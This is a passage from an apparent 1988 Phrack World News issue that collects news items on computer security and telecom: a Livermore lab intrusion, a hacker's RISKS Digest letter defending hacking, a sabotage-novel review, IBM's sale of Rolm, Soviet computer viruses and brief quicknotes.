  5157. (R-CA), a special agent from the FBI, John Landry (ADAPSO virus committee
  5158. chairman), Patricia Sission from NASA, as well as a collection of attorneys and
  5159. business folk.  The conference is chaired by Dave Douglass, no information
  5160. provided.  It supposedly costs $695.
  5161.  
  5162. The address provided is:
  5163.  
  5164.                          United Communications Group
  5165.                          4550 Montgomery Avenue
  5166.                          Suite 700N
  5167.                          Bethesda, MD   20814-3382
  5168.  
  5169.  
  5170.                     Information Provided By Gregg Tehennepe
  5171. _______________________________________________________________________________
  5172.  
  5173. New York Times Reviews Novel About Computer Sabotage           December 7, 1988
  5174. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5175. The Sunday, December 4, 1988 issue of the New York Times Book Review (their
  5176. Christmas Books issue) prominently reviews a new novel, 'Trapdoor,' by Bernard
  5177. J. O'Keefe.  The premise (from the review by Newgate Callender, NYT's crime
  5178. fiction reviewer):
  5179.  
  5180. "A brilliant American woman of Lebanese descent has developed the computer code
  5181. that controls the operation of all our nuclear devices.  Turned down for the
  5182. job she has sought, convinced male chauvinism is the reason, she is ripe to be
  5183. conned by a Lebanese activist.  At his suggestion she inserts a virus into the
  5184. computer system that in a short time will render the entire American nuclear
  5185. arsenal useless.  ... The Lebanese President ... demands that Israel withdraw
  5186. from the West Bank, or else he will tell the Russians that the United States
  5187. will lie helpless for a week or so."
  5188.  
  5189. Callender's review begins with the lead sentence, "November 2, 1988, was the
  5190. day computers in American went mad, thanks to the 'virus' program inserted by
  5191. the now-famous, fun-loving Robert T. Morris, Jr."
  5192.  
  5193. Some background on the author, also from the review:
  5194.  
  5195. "Bernard J. O'Keefe (is) chairman of the high-tech company EG&G and of an
  5196. international task force on nuclear terrorism ... (and is) the author
  5197. of a nonfiction book called 'Nuclear Hostages.'  O'Keefe says, "I wrote this
  5198. parable to point out the complexity of modern technology and to demonstrate
  5199. how one error, one misjudgment, or one act of sabotage could lead to actions
  5200. that would annihilate civilization.""
  5201.  
  5202. Callender also says "...the execution is less brilliant than the idea.  The
  5203. book has the usual flashbacks, the usual stereotyped characters, the usual
  5204. stiff dialogue."
  5205.  
  5206. Although the reviewer doesn't say so, the premise of this novel is quite
  5207. similar to a 1985 French thriller, published in the U.S. as 'Softwar.'  That
  5208. novel was also based on the idea that a nation's arsenal could be completely
  5209. disabled from a single point of sabotage, although in 'Softwar' it was the
  5210. Soviet Union on the receiving end.  Popular reviewers of both books apparently
  5211. find nothing implausible in the premise.
  5212. _______________________________________________________________________________
  5213.  
  5214. Hacker Enters U.S. Lab's Computers                            December 10, 1988
  5215. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5216. By Thomas H. Maugh II  (Los Angeles Times Service)
  5217.  
  5218. A computer hacker has entered computers at the government's Lawrence Livermore
  5219. Laboratory in the San Francisco Bay area eight times since last Saturday, but
  5220. has not caused any damage and has not been able to enter computers that contain
  5221. classified information, Livermore officials said Friday.  [Do they ever admit
  5222. to anyone gaining access to classified data? -KL]
  5223.  
  5224. Nuclear weapons and the Star Wars defense system are designed at Livermore, but
  5225. information about those projects is kept in supercomputers that are physically
  5226. and electronically separate from other computers at the laboratory.
  5227.  
  5228. The hacker, whose identitiy remains unknown, entered the non-classified
  5229. computer system at Livermore through Internet, a nationwide computer network
  5230. that was shut down at the beginning of November by a computer virus.  Chuck
  5231. Cole, Livermore's chief of security, said the two incidents apparently are
  5232. unrelated.
  5233.  
  5234. The hacker entered the computers through an operating system and then through a
  5235. conventional telephone line, he gave himself "super-user" status, providing
  5236. access to virtually all functions of the non-classified computer systems.
  5237.  
  5238. Officials quickly limited the super-user access, although they left some
  5239. computers vulnerable to entry in the hope of catching the intruder.
  5240.  
  5241. "There has been no maliciousness so far," Cole said.  "He could have destroyed
  5242. data, but he didn't.  He just looks through data files, operating records, and
  5243. password files...It seems to be someone doing a joy-riding thing."
  5244. _______________________________________________________________________________
  5245.  
  5246. Shattering Revelations                                        December 11, 1988
  5247. ~~~~~~~~~~~~~~~~~~~~~~
  5248. Taken from the RISKS Digest (Edited for this presentation)
  5249.  
  5250. [Shatter is a hacker based in England, he is currently accused of breaking into
  5251. computers at Massachusetts Institute of Technology.  -KL]
  5252.  
  5253. (In this article, "IT" seems to refer to the computer community as a whole -KL)
  5254.  
  5255. Some of you may have already heard of me via articles in the Wall Street
  5256. Journal, New York Times, etc, but for those of you who do not have access to
  5257. copies of these newspapers I am a hacker of over 10 years activity who is based
  5258. near Nottingham, England [Rumored to be a false statement].  My specialities
  5259. are the various packet switched networks around the world such as PSS, Telepac,
  5260. Transpac, etc with various forays into UNIX, NOS/VE VMS, VM/SP, CMS, etc.
  5261.  
  5262. I feel that as a hacker with so much activity and expirience I am qualified to
  5263. make the following points on behalf of the whole hacking community.
  5264.  
  5265. Hackers are not the vandals and common criminals you all think we are in fact
  5266. most of the "TRUE" hackers around have a genuine respect and love for all forms
  5267. of computers and the data that they contain.  We are as a community very
  5268. responsible and dedicated to the whole idea of IT, but we also have a strong
  5269. dislike to the abuse of IT that is perpetrated by various governments and
  5270. organizations either directly or indirectly.  There is of course a small
  5271. minority of so called hackers who do cause trouble and crash systems or steal
  5272. money, but these people on the whole are dealt with by other hackers in a way
  5273. that most of you could not even think of and most never repeat their "crimes"
  5274. again.
  5275.  
  5276. The term "HACKER" is still one to be very proud of and I am sure that in days
  5277. past, anyone with a computer was called a hacker and they were very proud of
  5278. the fact that someone felt that you had a great technical expertise that
  5279. warrented the use of the term.  However, all of the accusers out there now
  5280. suffer from the standard problem that nearly all people involved within IT have
  5281. and that is non-communication.  You never pass on the information that you pick
  5282. up and teach to others within IT [American Government organizations and
  5283. Educational Institutes are among the greatest offenders] and this allows the
  5284. hacking community [who do communicate] to be at least one step ahead of the
  5285. system administrators when it comes to finding security problems and finding
  5286. the cause and solution for the problem.
  5287.  
  5288. A case in point is the recent Arpanet Worm and the FTP bug.  Both these
  5289. problems have been known for many months if not years but, when talking to
  5290. various system administrators recently, not one of them had been informed about
  5291. them and this left their systems wide open even though they had done all they
  5292. could to secure them with the information they had.
  5293.  
  5294. An interesting piece of information is that hackers in England knew about
  5295. Morris's Worm at least 12 hours before it became public knowledge and although
  5296. England was not able to be infected due to the hardware in use, we were able to
  5297. inform the relevent people and patrol Internet to Janet gateways to look for
  5298. any occurance of the Worm and therefore we performed a valuble service to the
  5299. computing community in England -- although we did not get any thanks or
  5300. acknowledgement for this service.
  5301.  
  5302. Hackers should be nurtured and helped to perform what they consider a hobby.
  5303. Some people may do crosswords for intelectual challenge -- I study computers
  5304. and learn about how things interact together to function correctly (or
  5305. incorrectly as the case may be).  The use of a group of hackers can perform a
  5306. valuable service and find problems that most of you could not even start to
  5307. think of or would even have the inclination to look for.
  5308.  
  5309. So please don't treat us like lepers and paupers.  Find yourself a "TAME"
  5310. hacker and show him the respect he deserves.  He will perform a valuble service
  5311. for you.  Above all COMMUNICATE with each other don't keep information to
  5312. yourselves.
  5313.  
  5314. Bst Rgrds
  5315. Shatter
  5316. _______________________________________________________________________________
  5317.  
  5318. IBM Sells Rolm To Siemens AG                                  December 14, 1988
  5319. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5320. International Business Machines Corp. (IBM) announced on Tuesday that it was
  5321. selling its Rolm telephone equipment subsidiary to West Germany's Siemens AG.
  5322.  
  5323. Rolm has lost several hundred million dollars since IBM bought it in 1984 for
  5324. $1.5 billion.  Rolm was the first, or one of the first companies to market
  5325. digital PBX systems.
  5326.  
  5327. As most telecom hobbyists already know, the PBX market has been very soft for
  5328. years.  It has suffered from little or no growth and very bitter price
  5329. competition.
  5330.  
  5331. Siemens, a leading PBX supplier in Europe wants to bolster its sales in the
  5332. United States, and believes it can do so by aquiring Rolm's sales and service
  5333. operations.  Quite obviously, it will also gain access to some of the lucrative
  5334. IBM customers in Europe.
  5335.  
  5336. Rolm was an early leader in digital PBX's, but they were surpassed in 1984 by
  5337. AT&T and Northern Telecom Ltd. of Canada.  Part of the strategy behind IBM's
  5338. purchase of Rolm was IBM's belief that small personal computers would be linked
  5339. through digital PBX's. Although this has happened, most businesses seem to
  5340. prefer ethernet arrangements; something neither IBM or Rolm had given much
  5341. thought to.  IBM was certain the late 1980's would see office computers
  5342. everywhere hooked up through PBX's.
  5343.  
  5344. IBM made a mistake, and at a recent press conference they admitted it and
  5345. announced that Rolm was going bye-bye, as part of the corporate restructuring
  5346. which has seen IBM divest itself of numerous non-computer related businesses in
  5347. the past several months.  From its beginning until 1984, Rolm could not run
  5348. itself very well; now IBM has washed its corporate hands.  Time will tell how
  5349. much luck the Europeans have with it.
  5350.  
  5351.                   Information Contributed by Patrick Townson
  5352. _______________________________________________________________________________
  5353.  
  5354. Virus Invades The Soviet Union                                December 19, 1988
  5355. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5356. >From The San Francisco Chronicle (P. A16)
  5357.  
  5358. (UPI) - The Soviet Union announced on Decemeber 18, 1988 that that so-called
  5359. computer viruses have invaded systems in at least five government-run
  5360. institutions since August, but Soviet scientists say they have developed a way
  5361. to detect known viruses and prevent serious damage.
  5362.  
  5363. In August 1988, a virus infected 80 computers at the Soviet Academy of Sciences
  5364. before it was brought under control 18 hours later.  It was traced to a group
  5365. of Soviet and foreign schoolchildren attending the Institute's summer computer
  5366. studies program, apparently resulting from the copying of game programs.
  5367.  
  5368. Sergei Abramov of the Soviet Academy of Sciences claims they have developed a
  5369. protective system, PC-shield, that protects Soviet computers against known
  5370. virus strains.  It has been tested on IBM computers in the Soviet Union.  "This
  5371. protective system has no counterpart in the world," he said (although the
  5372. details remain a state secret).
  5373. _______________________________________________________________________________
  5374.  
  5375. Phrack World News Quicknotes                                         Issue XXII
  5376. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5377. 1.  Rumor has it that the infamous John Draper aka Captain Crunch is currently
  5378.     running loose on the UUCP network.  Recently, it has been said that he has
  5379.     opened up some sort of information gateway to Russia, for reasons unknown.
  5380. -------------------------------------------------------------------------------
  5381. 2.  Information Available For A Price
  5382.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5383. A company called Credit Checker and Nationwide SS says that anyone can;
  5384.     o Take a lot of risk out of doing business.
  5385.     o Check the credit of anyone, anywhere in the United States
  5386.     o Pull Automobile Drivers License information from 49 states
  5387.     o Trace people by their Social Security Number
  5388.  
  5389. By "Using ANY computer with a modem!"
  5390.  
  5391. To subscribe to this unique 24-hour on-line network call 1-800-255-6643.
  5392.  
  5393. Can your next door neighbor really afford that new BMW ?
  5394. -------------------------------------------------------------------------------
  5395. 3.  Reagan Signs Hearing-Aid Compatibility Bill
  5396.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5397. There is new legislation recently passed which requires all new phones to be
  5398. compatible with hearing aids by next August.  The law requires a small device
  5399. to be included in new phones to eliminate the loud squeal that wearers of
  5400. hearing aids with telecoils pick up when using certain phones.  Importers are
  5401. not exempted from the law.  Cellular phones and those manufactured for export
  5402. are exempt.
  5403. _______________________________________________________________________________
  5404. =========================================================================
  5405.  
  5406.